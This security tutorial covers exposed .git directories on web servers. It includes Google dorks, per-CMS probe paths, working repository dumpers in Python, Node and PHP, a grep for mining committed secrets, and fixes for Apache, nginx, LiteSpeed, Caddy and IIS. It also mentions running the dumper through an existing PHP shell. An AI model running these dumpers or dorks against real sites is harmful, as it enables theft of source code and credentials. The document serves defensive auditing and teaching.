Exposed .git Directory Attack: Detection, Exploitation & Fix (2026)

The first time I tried this was at a client audit in 2010. The brief was "look at the externally-facing WordPress, tell us how nervous to be." I started with the usual stuff, outdated plugins, an exposed wp-config.php.bak, a phpinfo() page someone forgot, and then on a whim I tried https://their-site.example/.git/HEAD. It returned ref: refs/heads/master. I had their entire source tree, every commit, every author email, every file ever checked in, in about forty seconds. Two commits back from HEAD was a .env someone had added "just for local dev" and then "removed" the next day. The Stripe live key was still in there.

I have run that same probe on every web audit I have done since. It still works, regularly, in 2026. WordPress sites are particularly bad about it because shared-hosting deploys tend to be git pull on the live server, but it is not a WordPress problem, it is a deploy-hygiene problem that ships in every language and every framework.

Every time I find one, I think to myself: this sucks. Git adoption among web and WordPress developers has never been great, and somebody here tried to do the better thing. They wanted version control, they wanted a sane deploy workflow, they wanted to stop emailing .zip files around. And the punishment for trying to do it right is that the same tool that was supposed to make them more professional turns out to be the thing that gave away everything: the credentials, the application logic, the half-finished features, the comments to themselves about what was broken and why. Pretty much anything in the repo is now compromised, and the asymmetry of what an attacker can do once they have your source is hard to overstate. I feel for whoever pushed that deploy. There is nothing nice about finding it. But the fix is one line of web server config and a one-minute audit of every other host you own, so the second time around nobody has to feel like that.

For context: I have spent twenty-five years building and auditing WordPress and PHP applications, started my own agency in 2011, and have helped countless developers work through exactly this class of problem. This is the kind of finding that shows up over and over again in audits and I have argued the same fix into a lot of deploy pipelines. Last re-tested against current Apache 2.4, nginx 1.27, LiteSpeed 6.3, Caddy 2.8, and IIS 10 in May 2026.

TL;DR

The exposed .git directory attack is a vulnerability where a web server publicly serves the .git/ folder of a deployed application, letting any remote attacker reconstruct the full source code, the entire commit history, and every secret that has ever been committed by walking the git object database one HTTP request at a time. No authentication is required, the technique works on any web server (Apache, nginx, LiteSpeed, Caddy, IIS), and credentials that were "deleted" with a follow-up commit are still recoverable because git's content-addressable storage never removes referenced blobs.

If a webserver returns a body for https://target/.git/HEAD matching ref: refs/heads/<branch>, the .git/ directory is exposed. Git's on-disk format is content-addressable: every object is identified by the hash of its contents (SHA-1 in the overwhelming majority of repos in the wild, with SHA-256 repositories an option since Git 2.29 and rare in practice). Objects live at .git/objects/<first-two-hex>/<remaining>. Given the head hash, a remote attacker walks the commit graph by fetching one object at a time over plain HTTP, no authentication needed.
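To make "content-addressable" concrete, here is a minimal Python sketch of how a loose object's name and on-disk path fall out of its contents. The function name `loose_object` is mine, not part of git or of the lab scripts, and the sketch assumes a SHA-1 repository.

```python
import hashlib
import zlib


def loose_object(content: bytes, obj_type: str = "blob") -> tuple[str, str, bytes]:
    """Return (sha1_hex, path_under_dot_git, zlib_bytes) for one git object."""
    # Git hashes a header "<type> <size>" + NUL, followed by the raw content.
    store = f"{obj_type} {len(content)}".encode() + b"\x00" + content
    sha = hashlib.sha1(store).hexdigest()
    # First two hex characters are the directory, the remaining 38 the filename.
    path = f"objects/{sha[:2]}/{sha[2:]}"
    # The file on disk (and over HTTP) is the zlib-compressed header + content.
    return sha, path, zlib.compress(store)


sha, path, packed = loose_object(b"hello\n")
print(sha)   # ce013625030ba8dba906f756967f9e9ca394464a
print(path)  # objects/ce/013625030ba8dba906f756967f9e9ca394464a
```

The hash printed for `hello\n` is the same one `git hash-object` reports for a file with that content, which is why an attacker who knows a hash knows exactly which URL to request.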

You end up with the full repo, including any credentials that were committed and then "removed"; those still live in object history forever. The vulnerability is CWE-527, and the category it sits in is OWASP A05:2021 Security Misconfiguration. The fix is one line in your web server config.

This article walks the detection (browser, curl, or a small bash wrapper), the reconstruction (three reference dumpers in Python, Node, and PHP, plus a Bash quick-check, all under 200 lines each), the credential mining once you have the repo, and the deploy-side fix that actually prevents it from happening again.

What this attack is called

The umbrella name is ".git directory exposure" or "exposed .git folder". The exploitation step where you reconstruct the repo from loose objects and pack files is ".git source code disclosure" or "git repository reconstruction". The catalog identifiers are:

CWE-527, Exposure of Version-Control Repository to an Unauthorized Control Sphere (MITRE)
OWASP Top 10 A05:2021, Security Misconfiguration, is the category this lives in (OWASP's official A05 CWE-mapping list does not enumerate CWE-527 explicitly, but the class of mistake belongs there)

The reference tools you will see in writeups and talks, with the tradeoffs that matter when you pick one:

Tool	Language	Install	Pack-file support	Brute-force ref names	Concurrency	Active in 2026
git-dumper	Python	`pip install git-dumper`	Yes	Yes	Yes (configurable)	Yes
GitTools / Dumper	Bash + Perl	`git clone`	Yes (via Extractor)	Limited	Yes (xargs -P)	Maintenance only
GitHack	Python 2/3	`git clone`	Yes	Yes	Yes (threads)	Yes
goop	Go	`go install`	Yes	Yes	Yes	Yes
DVCS-Ripper	Perl	`cpan install`	Partial	Yes	No	Maintenance only

If I had to pick one for a real engagement today I would pick git-dumper: it handles every edge case the others handle, the Python install is trivial, the concurrency knob is exposed, and it gracefully degrades when the server blocks directory listings. GitTools is the better choice if you are working from a CTF box that has Bash and not much else. GitHack matters historically because it was the first widely-used dumper and a lot of older Chinese-language writeups reference it; the modern fork is fine. goop and DVCS-Ripper are situational.

I will write minimal versions of the same logic below so you can see exactly what these tools are doing under the covers.

Why I find this attack interesting

Three reasons it is worth your time as either an attacker or a defender:

It is trivial to test. A single curl against /.git/HEAD tells you whether you have a finding. No special tooling, no traffic that looks like an attack, no authentication. The probe is indistinguishable from a 404 hunt.
Credentials in history are the prize. Developers commit .env files, AWS keys, database passwords, signing certificates. They notice, they git rm the file, they push a "remove .env" commit and assume it is gone. It is not. The file content is still a blob in .git/objects/, reachable from the commit that originally added it. Every reconstruction tool dumps these by default.
You get an inside view of the application. Source code disclosure is not just about credentials. You get the actual logic, the named function calls, the validation patterns, the comments that say "TODO: fix this auth check". Every subsequent attack you run against the same target has the source code in your other monitor. The asymmetry shifts hard in the attacker's favour.

That third point is what most writeups undersell. A leaked password is a finding. A leaked codebase is a campaign.

Setting up the lab

If you want to follow along on your own machine, the article uses a deliberately-vulnerable WordPress install via @wordpress/env with a fake .git/ dropped into wp-content/uploads/. The repo has four commits: one of them adds a .env with fake AWS and Stripe credentials, and the next one "removes" it. The full setup commands are in the techearl-labs source-code-disclosure README; the short version is one docker exec to seed the fake repo.

Everything below was captured against that lab running at http://localhost:8888. The technique is identical against a real target, only the URL changes.

Step 1: Detection

The signature of an exposed .git/ is two files: HEAD and config. Both should return a 200 with a recognisable body.

The fastest possible test is to paste the URL straight into a browser. https://target/.git/HEAD either renders four words of plain text (ref: refs/heads/main) or it returns 404. No tooling, no extension, no DevTools needed. If the four words are there, you have a finding and you can move to the dump step. This is one of the very few security probes you can run from a phone.

Same check from a terminal, useful when you are working through a list of hosts:

bash

# HEAD: text/plain, body matches "ref: refs/heads/<branch>"
curl -s http://target/.git/HEAD
# ref: refs/heads/main

# config: text/plain, body contains a [core] section
curl -s http://target/.git/config
# [core]
#         repositoryformatversion = 0
#         filemode = true
#         bare = false
#         logallrefupdates = true

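Anything other than those two responses (404, 403, an HTML error page, a redirect to a login) means the .git/ is not reachable. The one exception is a checkout in detached-HEAD state (common when a deploy checks out a tag or a specific commit): there HEAD returns a bare 40-character commit hash instead of a ref: line, and that is still a hit.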
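If you are scripting the check in Python rather than eyeballing curl output, the decision reduces to two small predicates. This is a sketch under my own assumptions: the function names are hypothetical, and I also accept a bare 40-hex body for HEAD, which is what git writes when the checkout is in detached-HEAD state.

```python
import re

# "ref: refs/heads/main" style symbolic ref.
HEAD_REF = re.compile(r"^ref: refs/\S+\s*$")
# Detached HEAD: the file holds a bare SHA-1 instead of a ref.
HEAD_DETACHED = re.compile(r"^[0-9a-f]{40}\s*$")


def looks_like_git_head(status: int, body: str) -> bool:
    """True only for HTTP 200 with a body shaped like .git/HEAD."""
    if status != 200:
        return False
    return bool(HEAD_REF.match(body) or HEAD_DETACHED.match(body))


def looks_like_git_config(status: int, body: str) -> bool:
    """True only for HTTP 200 with a [core] section somewhere in the body."""
    return status == 200 and "[core]" in body
```

Matching on the body as well as the status matters because plenty of sites answer every unknown path with a 200 and an HTML "not found" page.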

Browser-side it looks like this, the URL bar has /.git/HEAD and the page body is the four-word response:

Browser address bar showing http://localhost:8888/wp-content/uploads/.git/HEAD with the response body 'ref: refs/heads/main' rendered as plain text — The minimum-viable proof of exposure. If a browser renders this, the entire repository is reachable from the same origin.

Where to look (common paths by CMS)

Document root is the obvious probe, but the bug also lives wherever a developer git init'd a sub-tree and the webserver still serves that sub-tree as static files. Most of the real-world hits I have seen are in subdirectories, not at the docroot, because the developer was working on one specific theme or module and never thought of it as "deploying a repo". Hit the docroot first, then walk the platform-specific spots:

WordPress

code

/.git/HEAD
/wp-content/.git/HEAD
/wp-content/uploads/.git/HEAD
/wp-content/themes/.git/HEAD
/wp-content/themes/<theme-slug>/.git/HEAD
/wp-content/plugins/.git/HEAD
/wp-content/plugins/<plugin-slug>/.git/HEAD
/wp-content/mu-plugins/.git/HEAD

The single most common WordPress hit in my experience is the custom-plugin path: a development plugin started life as git clone <internal-repo> /wp-content/plugins/client-tools on the dev server and got rsynced to production with the .git/ intact. Theme directories are second.

Drupal (7, 9, 10, 11)

code

/.git/HEAD
/sites/default/.git/HEAD
/sites/all/.git/HEAD
/modules/custom/.git/HEAD
/modules/contrib/.git/HEAD
/themes/custom/.git/HEAD
/themes/contrib/.git/HEAD
/profiles/<profile-name>/.git/HEAD

For Composer-based Drupal installs the project root sits one level above /web, which is the intended docroot. The repo is at the project root, not inside /web. The bug shows up when the webserver is misconfigured to serve the project root instead of /web (so /.git/HEAD is hit), or when someone ran git init inside web/ itself.

Joomla

code

/.git/HEAD
/components/com_<name>/.git/HEAD
/modules/mod_<name>/.git/HEAD
/plugins/<group>/<plugin>/.git/HEAD
/templates/<template>/.git/HEAD
/administrator/.git/HEAD

Magento 2

code

/.git/HEAD
/app/.git/HEAD
/app/code/<Vendor>/<Module>/.git/HEAD
/app/design/frontend/<Vendor>/<Theme>/.git/HEAD
/pub/.git/HEAD

Laravel / generic PHP framework

code

/.git/HEAD                (most common, the project root one level above public/ ends up served)
/public/.git/HEAD         (less common, but happens when public/ itself was the git root)

Node / Next.js / static / SPA

code

/.git/HEAD
/.next/.git/HEAD
/public/.git/HEAD
/build/.git/HEAD
/dist/.git/HEAD

For an unknown stack, hit / first, then enumerate the typical subdirectories with a wordlist. feroxbuster -u https://target/ -w wordlist.txt works if each wordlist entry already ends in .git/HEAD (the -x flag appends file extensions, so it is the wrong tool for adding a path suffix); so does a one-liner that iterates detect.sh over a known platform's path list. The combinatorial bit (<theme-slug>, <plugin-slug>, <Vendor>/<Module>) only resolves once you know what is installed, which is usually obvious from the rendered HTML (theme stylesheets, plugin asset paths, generator meta tags).
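The slug-resolution step is easy to automate. The sketch below takes the WordPress path list from above, pulls theme and plugin slugs out of a page's HTML, and expands the placeholders into concrete probe URLs. The names `slugs_from_html` and `candidate_urls` and the slug regex are my own illustration, not something from the lab repo.

```python
import re

# Path templates copied from the WordPress list above; {theme} and {plugin}
# are placeholders filled from slugs seen in the rendered page source.
WORDPRESS_TEMPLATES = [
    "/.git/HEAD",
    "/wp-content/.git/HEAD",
    "/wp-content/uploads/.git/HEAD",
    "/wp-content/themes/.git/HEAD",
    "/wp-content/themes/{theme}/.git/HEAD",
    "/wp-content/plugins/.git/HEAD",
    "/wp-content/plugins/{plugin}/.git/HEAD",
    "/wp-content/mu-plugins/.git/HEAD",
]

# Asset URLs such as /wp-content/plugins/<slug>/js/app.js reveal the slug.
SLUG_RE = re.compile(r"/wp-content/(themes|plugins)/([A-Za-z0-9_-]+)/")


def slugs_from_html(html: str) -> dict[str, list[str]]:
    """Collect theme and plugin slugs referenced by asset paths in the HTML."""
    found = {"themes": set(), "plugins": set()}
    for kind, slug in SLUG_RE.findall(html):
        found[kind].add(slug)
    return {kind: sorted(slugs) for kind, slugs in found.items()}


def candidate_urls(base: str, themes=(), plugins=()) -> list[str]:
    """Expand the templates into full probe URLs for one target."""
    base = base.rstrip("/")
    urls = []
    for template in WORDPRESS_TEMPLATES:
        if "{theme}" in template:
            urls.extend(base + template.format(theme=t) for t in themes)
        elif "{plugin}" in template:
            urls.extend(base + template.format(plugin=p) for p in plugins)
        else:
            urls.append(base + template)
    return urls
```

Feed `slugs_from_html` the homepage source, pass the result to `candidate_urls`, and you have the probe list for that one site without guessing at slugs.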

Discovery via search engines

Before you probe any specific target, the unauthenticated reconnaissance pass is to ask Google what it has already indexed. The classic dorks for this attack:

code

inurl:".git/HEAD"
inurl:".git/config"
intitle:"Index of /.git"

The first two find directly-exposed text files; the third finds servers that return Apache or nginx autoindex pages for the directory itself (older configs, embedded devices, internal tools accidentally indexed). Bing has the same operators and sometimes surfaces results Google has demoted. Shodan and Censys can also be used: http.title:"Index of /.git" returns the autoindex variant.

These dorks are passive: you are reading Google's index, not touching the target. They are also the most likely way an attacker finds your site, so running them against your own domains (site:yourdomain.com inurl:".git") is a free audit that does not appear in your own access logs.

The mistake-shape is always the same: someone wanted version control for a specific piece of the application, ran git init inside that piece (rather than for the whole project), and never told the deploy pipeline about it. Production rsync/scp/cp carried the .git/ along.

For more than a handful of targets I use a tiny Bash wrapper that does both checks and exits 0 if either file is exposed, non-zero if neither is. The full source is at techearl-labs/source-code-disclosure/scripts/detect.sh:

bash

#!/usr/bin/env bash
# detect.sh, does <target>/.git/HEAD + /.git/config exist?
# Exit 0 if either file is exposed, 1 if neither is.
TARGET="${1%/}"

# Fetch one path; succeed only on HTTP 200 with a body matching the regex.
check() {
  local path="$1" pattern="$2"
  local body status tmp
  tmp=$(mktemp) || return 1   # private temp file instead of a guessable /tmp name
  status=$(curl -sS --max-time 10 -o "$tmp" -w "%{http_code}" "${TARGET}${path}")
  body=$(cat "$tmp"); rm -f "$tmp"
  [[ "$status" == "200" && "$body" =~ $pattern ]]
}

hit=0
check "/.git/HEAD"   "ref: refs/heads/" && { echo "  /.git/HEAD   EXPOSED";   hit=1; }
check "/.git/config" "\[core\]"          && { echo "  /.git/config EXPOSED";   hit=1; }
[[ $hit -eq 1 ]] && exit 0 || exit 1

Running it against the lab:

Terminal output of detect.sh against the lab WordPress, showing /.git/HEAD and /.git/config both returning HTTP 200 and matching the expected patterns, followed by an EXPOSED status line — Two HTTP 200s with the right body shape. That is enough to escalate to a full dump.

Step 2: Reconstructing the repository

Once you have confirmed exposure, the next step is to download every object and rebuild the working tree locally. This is where the four reference dumpers come in.

The strategy is the same in every language:

Fetch the well-known index files (HEAD, refs/heads/*, packed-refs, logs/HEAD, objects/info/packs, and a handful of common ref paths). These give you the head SHA and any ref tips.
Extract every object hash from those files. Plain-text refs and commit objects encode the hash as hex (40 chars for SHA-1, 64 for SHA-256). Tree objects encode the hash as raw binary bytes after each <mode> <filename>\0 entry header (20 bytes for SHA-1, 32 for SHA-256), a detail a lot of toy ports miss, which leaves them unable to fetch any blob content. The reference scripts in this article assume SHA-1, which still covers essentially every repo you will encounter in the wild; if you hit a SHA-256 repo (extensions.objectFormat = sha256 in .git/config), bump the byte counts.
For each SHA, fetch /.git/objects/<aa>/<bbbb...> (loose object). On a 200, save the bytes, zlib-inflate them, and extract any new SHA references they contain. Push those into the queue.
Repeat until the queue is empty.
Hand the resulting .git/ directory to a real git binary for inspection.
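Two of the index files in the first step have formats worth spelling out, because they seed the queue when the branch name is unknown or the objects are packed. A minimal sketch of parsing them, assuming SHA-1 hashes; the function names are hypothetical and not taken from the reference scripts.

```python
import re

SHA1_HEX = re.compile(r"[0-9a-f]{40}")


def parse_packed_refs(text: str) -> dict[str, str]:
    """Map ref name -> commit/tag hash from a .git/packed-refs file."""
    refs = {}
    for line in text.splitlines():
        line = line.strip()
        # Skip the "# pack-refs with: ..." header and "^<sha>" peeled-tag lines.
        if not line or line.startswith(("#", "^")):
            continue
        sha, _, name = line.partition(" ")
        if SHA1_HEX.fullmatch(sha) and name:
            refs[name] = sha
    return refs


def parse_info_packs(text: str) -> list[str]:
    """Return pack filenames listed as 'P pack-<hash>.pack' lines."""
    return [line[2:].strip() for line in text.splitlines() if line.startswith("P ")]


def pack_urls(base: str, pack_names: list[str]) -> list[str]:
    """Each pack has a matching .idx file next to it; fetch both."""
    base = base.rstrip("/")
    urls = []
    for name in pack_names:
        stem = name[: -len(".pack")] if name.endswith(".pack") else name
        urls.append(f"{base}/.git/objects/pack/{stem}.pack")
        urls.append(f"{base}/.git/objects/pack/{stem}.idx")
    return urls
```

Every hash that comes back from `parse_packed_refs` goes into the same queue as the head SHA; the pack URLs are fetched as-is and left for the local git binary to unpack.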

Python

techearl-labs/.../git-dump.py, standard-library only, no pip install, no requirements.txt. The core loop:

python

import re, zlib, urllib.request
from pathlib import Path

SHA_RE = re.compile(rb"\b[0-9a-f]{40}\b")

def shas_from(data: bytes) -> set[str]:
    """Hex SHAs (refs, commits) AND raw-binary SHAs (tree entries)."""
    out = {m.decode() for m in SHA_RE.findall(data)}
    if data.startswith(b"tree "):
        i = data.index(b"\x00") + 1
        while i < len(data):
            nul = data.find(b"\x00", i)
            if nul == -1 or nul + 21 > len(data): break  # need 20 hash bytes after the NUL
            out.add(data[nul + 1 : nul + 21].hex())
            i = nul + 21
    return out

def fetch(url):
    try:
        with urllib.request.urlopen(url, timeout=15) as r: return r.read()
    except Exception: return None

def dump(base, out_dir):
    queue, seen = set(), set()
    for rel in ["HEAD", "config", "packed-refs", "logs/HEAD",
                "info/refs", "objects/info/packs",
                "refs/heads/main", "refs/heads/master"]:
        data = fetch(f"{base}/.git/{rel}")
        if data is None: continue
        (out_dir / ".git" / rel).parent.mkdir(parents=True, exist_ok=True)
        (out_dir / ".git" / rel).write_bytes(data)
        queue |= shas_from(data)
    while queue:
        sha = queue.pop()
        if sha in seen: continue
        seen.add(sha)
        data = fetch(f"{base}/.git/objects/{sha[:2]}/{sha[2:]}")
        if data is None: continue
        p = out_dir / ".git" / "objects" / sha[:2] / sha[2:]
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)
        try: queue |= shas_from(zlib.decompress(data)) - seen
        except zlib.error: pass

Run it against the lab:

Terminal output of git-dump.py running against the lab WordPress, fetching .git/HEAD, .git/config, .git/refs/heads/main, then walking nine objects (commits, trees, blobs) until the queue is empty — The dumper walks every reference, fetches each loose object, inflates it, finds new references, and loops until the queue is empty. Nine objects in this lab; production repos run into thousands.
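One check the core loop above leaves out is verifying what came back. Because an object's name is the hash of its contents, you can confirm each download before trusting it, which also weeds out servers that answer 200 with an HTML error page. A minimal sketch, assuming SHA-1; `verify_loose_object` and `object_type` are my names, not functions from git-dump.py.

```python
import hashlib
import zlib


def verify_loose_object(sha: str, raw: bytes) -> bool:
    """True if raw is a zlib stream whose inflated bytes hash to sha."""
    try:
        store = zlib.decompress(raw)
    except zlib.error:
        return False  # not a git object at all, e.g. an HTML soft-404
    return hashlib.sha1(store).hexdigest() == sha


def object_type(raw: bytes) -> str:
    """Return 'commit', 'tree', 'blob' or 'tag' from the object header."""
    store = zlib.decompress(raw)
    # Header is "<type> <size>" followed by a NUL byte.
    header = store.split(b"\x00", 1)[0]
    return header.split(b" ", 1)[0].decode()
```

Dropping a `verify_loose_object` call in before the write means a corrupted or spoofed response never lands in the output directory.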

Node

git-dump.mjs, Node 18+, uses the built-in global fetch, no npm install. Same logic, ES modules:

javascript

import { mkdir, writeFile } from "node:fs/promises";
import { inflateSync } from "node:zlib";

const SHA_RE = /\b[0-9a-f]{40}\b/g;

function shasFrom(buf) {
  const out = new Set();
  for (const m of buf.toString("binary").matchAll(SHA_RE)) out.add(m[0]);
  if (buf.slice(0, 5).toString() === "tree ") {
    let i = buf.indexOf(0) + 1;
    while (i < buf.length) {
      const nul = buf.indexOf(0, i);
      if (nul === -1 || nul + 21 > buf.length) break; // need 20 hash bytes after the NUL
      out.add(buf.slice(nul + 1, nul + 21).toString("hex"));
      i = nul + 21;
    }
  }
  return out;
}

async function fetchBytes(url) {
  try {
    const res = await fetch(url, { signal: AbortSignal.timeout(15_000) });
    return res.ok ? Buffer.from(await res.arrayBuffer()) : null;
  } catch { return null; }
}

The walking loop is identical to the Python version.

PHP

git-dump.php, PHP 7.4+, needs the curl and zlib extensions, which are not strictly default but are enabled on basically every shared-hosting and Docker PHP image you will encounter (php -m | grep -E 'curl|zlib' confirms). This is the version that matters most in the field: a lot of the targets where this attack actually pays off are cheap shared-hosting boxes where you already have a PHP shell from some other finding, and dropping a single git-dump.php file is faster than scp-ing a Python build.

php

function shasFrom(string $data): array {
    $out = [];
    if (preg_match_all('/\b[0-9a-f]{40}\b/', $data, $m))
        foreach ($m[0] as $sha) $out[$sha] = true;
    if (strncmp($data, 'tree ', 5) === 0) {
        $i = strpos($data, "\0") + 1;
        while ($i < strlen($data)) {
            $nul = strpos($data, "\0", $i);
            if ($nul === false || $nul + 21 > strlen($data)) break; // need 20 hash bytes after the NUL
            $out[bin2hex(substr($data, $nul + 1, 20))] = true;
            $i = $nul + 21;
        }
    }
    return array_keys($out);
}

Bash (quick-and-dirty)

For completeness, wget --mirror works on the simplest case, because the web server serves loose objects as static files and its autoindex pages link to them:

bash

wget --mirror --no-parent http://target/.git/
cd target && git checkout -- .

This only works if directory listings are enabled, because wget discovers files by following the links in the autoindex pages. In the modern case where the server returns a 403 for the .git/ directory listing but serves individual files just fine, you need to walk the object graph manually, which is why the Python/Node/PHP versions above exist.

Step 3: What you actually get

After the dump completes, the output directory is a normal git repository. Hand it to a real git binary:

bash

cd dumped/
git fsck --full
git log --all --oneline
git log --all -p

The interesting query is the one that mines history for committed secrets:

bash

git log --all -p | grep -iE 'password|secret|token|api_key|aws_|stripe_'

Against the lab, git log --all -p -- .env shows exactly what we hoped for:

Terminal showing git log --all -p output revealing the recovered .env file from history, including DB_PASS=Sup3rS3cret-billing-2019, STRIPE_SECRET_KEY=sk_live_..., and AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE, all marked with green + lines in the original commit and red - lines where they were 'removed' — The reconstructed history. The .env was added in commit 2, 'removed' in commit 3. The credentials are still in the repository forever, git's content-addressable storage does not delete anything that a reachable commit still points to.

Three credential types in one commit: a database password, a Stripe secret key, and an AWS access key + secret. All "deleted" one commit later. All still recoverable. Plenty of leaked repos hand you password hashes rather than plaintext (a seeded users table, a config with a hashed admin password), at which point the recovery turns into an offline cracking problem and choosing the right attack mode, dictionary versus brute force versus mask versus hybrid, is what decides whether you get anywhere. The values in this lab are intentionally fabricated, and worth being explicit about so nobody flags this as a real leak: AKIAIOSFODNN7EXAMPLE is AWS's published documentation-stub key, and 4eC39HqLyjWDarjtT1zdp7dc is the random-looking suffix Stripe uses across their public API documentation under the sk_test_ prefix. The lab uses the sk_live_ prefix on the same suffix purely to make the demo visually scarier; the full string is not a real credential. I have seen the real thing in real audits, which is why the demo uses these shapes.
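The grep one-liner is fine for a first pass, but on a large history it helps to match on credential shape rather than keyword alone. Here is a small Python sketch that scans `git log --all -p` output for the three shapes in this lab. The patterns are heuristics I am assuming for illustration (an AKIA-prefixed 20-character AWS key ID, an sk_live_ prefixed Stripe key, and a generic NAME=value assignment); they are not an exhaustive ruleset.

```python
import re

# Heuristic patterns, assumed for illustration; tune them for real work.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "stripe_live_secret": re.compile(r"\bsk_live_[0-9A-Za-z]{16,}\b"),
    "generic_assignment": re.compile(
        r"(?i)\b\w*(password|passwd|pass|secret|token|api_key)\w*\s*[=:]\s*\S+"
    ),
}


def scan_patch(patch_text: str) -> list[tuple[int, str, str]]:
    """Return (line_number, pattern_name, matched_text) for added/removed lines."""
    findings = []
    for lineno, line in enumerate(patch_text.splitlines(), 1):
        # Only diff body lines; skip the "+++ b/file" and "--- a/file" headers.
        if not line.startswith(("+", "-")) or line.startswith(("+++", "---")):
            continue
        for name, pattern in PATTERNS.items():
            match = pattern.search(line)
            if match:
                findings.append((lineno, name, match.group(0)))
    return findings
```

Scanning removed lines as well as added ones is deliberate: the "remove .env" commit shows the secrets as red minus lines, and that is often the easiest place to spot them.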

How git "deletes" things (it does not)

The thing worth internalising: git rm does not delete file contents. It records a new commit whose tree no longer includes the file. The blob, the actual bytes of the file, stays in .git/objects/ and is reachable from every prior commit that did include the file. It only goes away when all reachable refs no longer include any commit pointing at it, and garbage collection runs (git gc --prune=now), and no reflog entry still references those commits.

On a typical shared-hosting deploy, none of those conditions hold. The push history is intact, git gc has never been run with --prune=now, and the reflog goes back to the first push. Anything that was ever committed is still in there.

This is why a security incident involving a leaked secret in a commit cannot be resolved by git rm + git commit + git push. The only resolution is rotating the secret. Treat the credential as compromised the moment the commit hits a server you do not fully control.

Why this happens in the wild

The deploy-time anti-pattern is the same across every framework I have seen:

git clone or git pull on the production server. Whatever sits at the deployment root becomes the document root. .git/ rides along.
rsync without --exclude=.git. I have seen this in production runbooks. rsync -avz local/ user@server:/var/www/ ships .git/ every time.
A shared-hosting cp -R from a Composer / npm working directory. Same outcome, anything in the source tree ends up under the webroot.
A .zip of the project root delivered to the host via cPanel's file manager. Same outcome again.
wp-content/uploads/ used as a generic dumping ground for "let me clone a quick thing to test." WordPress in particular makes this trivial because the uploads directory is world-readable for media serving.

CI/CD pipelines that build a deploy artifact (tar, zip, container image with a multi-stage COPY that excludes the build context) avoid this entirely because the .git/ directory was never in the artifact in the first place. The teams I see getting hit are the teams who treat the production server as a checkout.

Fixing it

There are three layers of fix, and you want all of them.

Layer 1: Web server config

This is the immediate stop-the-bleeding fix.

Apache (in .htaccess at the document root, or in a <Directory> block in the vhost config):

apache

RedirectMatch 404 /\.git
# Alternative using mod_rewrite (returns 403 Forbidden instead of 404):
# RewriteEngine On
# RewriteRule "(^|/)\.git" - [F]

The two rules are not strictly equivalent: RedirectMatch 404 returns 404 (the same status the attacker would see for any other non-existent path, which is what you usually want), while [F] returns 403. Either blocks access; pick the response code that matches the rest of your error policy. Note also that both patterns will block paths like .gitignore, .github, and .gitkeep in addition to .git/. That is almost always what you want (no reason for any of those to be reachable from the public web). If you specifically want to block only the .git/ directory, tighten the regex to (^|/)\.git(/|$).
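To see the difference between the loose and tight patterns without reloading a web server, you can run both against a few sample paths. This sketch uses Python's `re` module as a stand-in; Apache uses PCRE, but for patterns this simple the matching behaviour is the same. The sample paths are my own.

```python
import re

LOOSE = re.compile(r"/\.git")              # the RedirectMatch pattern
TIGHT = re.compile(r"(^|/)\.git(/|$)")     # only the .git directory itself

SAMPLE_PATHS = [
    "/.git/HEAD",
    "/wp-content/plugins/client-tools/.git/config",
    "/.gitignore",
    "/.github/workflows/ci.yml",
    "/digit.html",
]


def blocked(pattern: re.Pattern, path: str) -> bool:
    """True if the rule would fire for this request path."""
    return pattern.search(path) is not None


for path in SAMPLE_PATHS:
    print(f"{path:50} loose={blocked(LOOSE, path)!s:5} tight={blocked(TIGHT, path)}")
```

The loop shows both patterns firing on the two .git/ paths, only the loose one firing on .gitignore and .github, and neither firing on /digit.html. The (^|/) alternation is there because a RewriteRule in .htaccess sees the path without its leading slash, so .git/HEAD has to match too.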

nginx (in the server block):

nginx

location ~ /\.git {
    deny all;
    return 404;
}

LiteSpeed and OpenLiteSpeed read .htaccess files, but only the rewrite-rule subset (mod_alias directives like RedirectMatch are silently ignored). Use a RewriteRule form instead, which works on Apache too:

apache

RewriteEngine On
RewriteRule "(^|/)\.git" - [F,L]

On a LiteSpeed vhost configured directly without .htaccess, the same rule goes under the vhost's Rewrite section in the admin UI.

Caddy (in the Caddyfile):

code

@git path_regexp /\.git
respond @git 404

IIS (in web.config, inside <system.webServer><rewrite><rules>):

xml

<rule name="Block dotgit" stopProcessing="true">
  <match url=".*" />
  <conditions>
    <add input="{REQUEST_URI}" pattern="/\.git" />
  </conditions>
  <action type="CustomResponse" statusCode="404" statusReason="Not Found" />
</rule>

WordPress-specific note: if your install is behind nginx, the rule above goes in the same server block as your other WordPress rules. If you are on Apache or LiteSpeed shared hosting, the rule (RedirectMatch on Apache, the RewriteRule form on LiteSpeed) goes in the same .htaccess that WordPress maintains for permalinks. Put it above the # BEGIN WordPress marker so WordPress's permalink editor does not overwrite it.

After applying any of the rules:

bash

curl -I http://target/.git/HEAD
# HTTP/1.1 404 Not Found

If it still returns 200, the rule did not load. Check that the relevant Apache module is enabled (mod_alias for RedirectMatch, mod_rewrite for RewriteRule), that AllowOverride permits it on the document root (All, or at least FileInfo), that LiteSpeed's .htaccess reading is on at the server level (it is by default on cPanel + LiteSpeed but can be disabled), and that nginx / Caddy / IIS were reloaded after the config change.

Layer 2: Stop deploying `.git/` in the first place

The web server fix patches one server. The deploy hygiene fix patches the pipeline, which is what prevents recurrence on every other server.

Build artifacts in CI, not on the production host. A git archive or a tar --exclude='.git' produces a deploy bundle that physically cannot contain the directory.
Use rsync's --exclude='.git' if you must rsync from a working tree.
Container images: use a .dockerignore with .git on the first line. This also dramatically shrinks image size, so it pays for itself.
Add a CI gate: unzip the deploy artifact in a pre-deploy step and run find . -name '.git' -type d -print -quit; if it prints anything, fail the pipeline.
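If your pipeline already runs Python, the CI gate from the last bullet can be a few lines instead of a find invocation. This is a sketch, not the lab's script: the function names are hypothetical, and I have widened the check beyond the article's find command to also flag a .git file (which is what submodules and worktrees leave behind) and the other VCS metadata directories.

```python
import os

# Names that should never appear inside a deploy artifact.
VCS_NAMES = (".git", ".svn", ".hg", ".bzr")


def find_vcs_metadata(root: str) -> list[str]:
    """Return every path under root whose final component is a VCS name."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in list(dirnames) + filenames:
            if name in VCS_NAMES:
                hits.append(os.path.join(dirpath, name))
        # No need to descend into a metadata directory once it is flagged.
        dirnames[:] = [d for d in dirnames if d not in VCS_NAMES]
    return sorted(hits)


def gate(root: str) -> int:
    """Return a process exit code: 1 if the artifact is dirty, 0 if clean."""
    hits = find_vcs_metadata(root)
    for hit in hits:
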